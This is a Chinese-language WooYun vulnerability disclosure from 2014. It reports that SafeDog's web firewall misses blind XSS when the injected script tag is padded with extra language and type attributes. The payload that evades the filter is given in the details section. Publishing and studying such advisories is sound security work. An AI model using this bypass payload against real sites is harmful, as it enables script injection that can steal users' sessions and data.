漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-049676
漏洞标题:XSS安全狗盲打时绕过过滤(牺牲长度限制)
相关厂商:安全狗
漏洞作者: zeuser
提交时间:2014-01-23 19:39
修复时间:2014-04-20 19:40
公开时间:2014-04-20 19:40
漏洞类型:非授权访问/权限绕过
危害等级:中
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-01-23: 细节已通知厂商并且等待厂商处理中
2014-02-02: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-03-29: 细节向核心白帽子及相关领域专家公开
2014-04-08: 细节向普通白帽子公开
2014-04-18: 细节向实习白帽子公开
2014-04-20: 细节向公众公开
简要描述:
通过增加长度,绕过安全狗XSS过滤提示
详细说明:
XSS插入网站时,经常使用script标签引入外部的JS脚本.
例如:<script src='xxxx'></script>这种已经被无情的过滤
如果此时牺牲长度限制,我们插入如下的script标签,安全狗就不会提示:
<script language="javascript" type="text/javascript" src="xxxx"></script>
漏洞证明:
修复方案:
你们更专业
版权声明:转载请注明来源 zeuser@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-04-20 19:40
厂商回复:
最新状态:
暂无